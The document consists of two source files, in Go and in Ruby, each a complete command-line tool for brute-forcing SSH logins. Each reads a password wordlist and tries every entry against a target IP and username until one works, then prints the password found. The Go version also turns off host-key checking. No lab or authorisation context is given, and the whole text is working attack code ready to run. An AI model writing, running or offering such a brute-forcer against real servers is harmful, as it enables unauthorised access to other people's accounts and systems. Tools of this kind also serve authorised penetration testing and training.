File: ssh.go
package main

import (
	"fmt"
	"io/ioutil"
	"strings"
	"golang.org/x/crypto/ssh"
	"flag"
	"time"
)

// Function to attempt SSH login
func tryLogin(username, password, targetIP string) bool {
	// Setup the SSH client configuration
	config := &ssh.ClientConfig{
		User: username,
		Auth: []ssh.AuthMethod{
			ssh.Password(password),
		},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
		Timeout:         5 * time.Second,
	}

	// Connect to the SSH server
	conn, err := ssh.Dial("tcp", targetIP+":22", config)
	if err != nil {
		return false
	}
	defer conn.Close()

	// Successful login if we reached this point
	return true
}

func main() {
	// Define command line flags
	username := flag.String("l", "", "Username for SSH login")
	passwordList := flag.String("P", "", "File with list of passwords")
	targetIP := flag.String("target", "", "Target IP address for SSH login")

	flag.Parse()

	// Validate flags
	if *username == "" || *passwordList == "" || *targetIP == "" {
		fmt.Println("Usage: ssh.go -l username -P passwordlist -target <target_ip>")
		return
	}

	// Read the password list file
	passwords, err := ioutil.ReadFile(*passwordList)
	if err != nil {
		fmt.Println("Error reading password list:", err)
		return
	}

	// Split the passwords into a slice
	passwordListSlice := strings.Split(string(passwords), "\n")

	// Iterate through each password in the list
	for _, password := range passwordListSlice {
		password = strings.TrimSpace(password) // Remove any leading/trailing spaces

		if password == "" {
			continue
		}

		// Try the password
		fmt.Printf("Trying password: %s...\n", password)

		if tryLogin(*username, password, *targetIP) {
			// If login is successful
			fmt.Printf("\033[32mKEY FOUND: %s\033[0m\n", password) // Green output for success
			return
		}
	}

	// If no password was found
	fmt.Printf("\033[31mKEY NOT FOUND\033[0m\n") // Red output for failure
}

File: ssh.rb
require 'net/ssh'
require 'optparse'
require 'colorize'

# Function to perform the brute-force attempt
def ssh_bruteforce(target_ip, username, password_list)
  password_list.each do |password|
    begin
      # Try connecting via SSH
      Net::SSH.start(target_ip, username, password: password) do |ssh|
        puts "KEY FOUND: #{password}".green
        return true  # Stop as soon as a valid password is found
      end
    rescue Net::SSH::AuthenticationFailed
      # Invalid password, skip to the next one
      next
    rescue StandardError => e
      puts "Error occurred: #{e.message}".red
      break
    end
  end
  puts "KEY NOT FOUND".red
  false
end

# Parse command-line options
options = {}
OptionParser.new do |opts|
  opts.banner = "Usage: ssh.rb -l username -P passwordlist ssh://<target-ip>"

  opts.on("-l", "--username USERNAME", "Username for SSH login") do |username|
    options[:username] = username
  end

  opts.on("-P", "--passwordlist PASSWORDLIST", "Path to password list file") do |file|
    options[:passwordlist] = file
  end

  opts.on("-t", "--target TARGET", "Target SSH server (ssh://<ip>)") do |target|
    options[:target] = target.sub('ssh://', '') # Remove the "ssh://" prefix
  end
end.parse!

# Check if all necessary options are provided
if options[:username].nil? || options[:passwordlist].nil? || options[:target].nil?
  puts "Missing arguments. Please provide a username, password list, and target IP.".red
  exit 1
end

# Read password list from the file
begin
  password_list = File.readlines(options[:passwordlist]).map(&:chomp)
rescue Errno::ENOENT
  puts "Password list file not found.".red
  exit 1
end

# Perform the brute-force SSH attack
ssh_bruteforce(options[:target], options[:username], password_list)
